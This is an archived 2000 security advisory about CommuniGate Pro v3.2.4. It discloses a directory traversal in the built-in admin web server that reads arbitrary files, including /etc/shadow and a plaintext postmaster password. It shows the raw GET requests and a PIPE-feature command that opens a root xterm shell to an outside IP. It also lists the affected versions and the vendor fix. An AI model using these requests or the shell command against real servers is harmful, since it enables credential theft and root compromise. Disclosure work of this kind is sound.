OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4
From: Lluis Mora (llmoraS21SEC.COM)
Date: Mon Jul 17 2000 - 14:09:41 CDT


###############################################################
ID: S21SEC-003-en
Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4
Date: 03/04/2000
Status: Vendor contacted
Scope: Remote command execution as superuser
Platforms: Linux, probably others
Author: llmora, fjserna
Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt
Release: Public
###############################################################

                                S 2 1 S E C

                           http://www.s21sec.com

                Vulnerabilities in Stalker's CommuniGate Pro v3.2.4

About CommuniGate Pro
---------------------

CommuniGate Pro is a feature-full commercial mail server
(http://www.stalker.com/CommuniGatePro/).

It does SMTP message routing, provides POP, IMAP and HTTP access to mail,
etc.

The CommuniGate Pro mail server has a built-in web server that allows
users to read and send e-mail through the web, as well as allowing the
administrator to remotely manage the mail server settings.

By default it opens port 8100/tcp for web users access to mail and port
8010/tcp for web management access.

Vulnerability description
-------------------------

1. Reading any file in the mail server

CommuniGate provides a useful mapping to access the Web User Guide, which
maps the URL /Guide/ to a directory in the CommuniGate sub tree. The
built-in web server suffers of the well-known "../.." web server problem.
If we request a document from the administrative web server /Guide/ mapping,
using the "../.." technique, we get to see the file contents:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0

HTTP/1.0 200 OK
[... the /etc/motd file content is shown]

Connection closed by foreign host.
homer:~$

As CommuniGate runs as root and it doesn't drop any privileges, we are
able to access any file in the system, e.g. /etc/shadow, ...

E.g., we can retrieve the postmaster/manager settings file, which
includes the plaintext password to access the management website:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET
/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.
macnt/account.settings HTTP/1.0

HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT

{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$

2. Remote execution of arbitrary commands as root

This is not a vulnerability in itself but a demonstration of what can be
accomplished once an attacker has obtained the postmaster password.

Looking up the features of CommuniGate, we find the PIPE feature. It
allows people to send e-mail to a program in the mail server. It's
disabled by default, but once we can access the mail server settings using
the postmaster password, we can just enable it, make the application
directory be /usr/X11R6/bin/, increase the max. process execution time,
and send an e-mail to "xterm -display 172.16.2.4:0 -e /bin/sh"pipe
which will open a root xterm in our desktop...

Affected versions and platforms
-------------------------------

This bug has been tested on the Linux (non-redhat & redhat) v3.2.4 (the
latest stable release) distribution found at www.stalker.com. It has not
been tested with other platforms or previous versions, though we strongly
believe the bug is platform independent, and can probably be found and
reproduced in previous releases.

Current beta versions (as from v3.3b2) don't suffer from this security
problem.

Fix information
---------------

There is an upcoming stable release (v3.3) that will fix this problem,
and currently the v3.3 betas (v3.3b2 or newer) are patched against this
attack.

Upgrades are available from the vendor website at http://www.stalker.com.

Additional information
----------------------

This vulnerability was found and researched by:

 Lluis Mora llmoras21sec.com
 Fermin J. Serna fjsernas21sec.com

You can find the latest version of this advisory at:

        http://www.s21sec.com/en/avisos/s21sec-003-en.txt

And other S21SEC advisories at http://www.s21sec.com/en/avisos/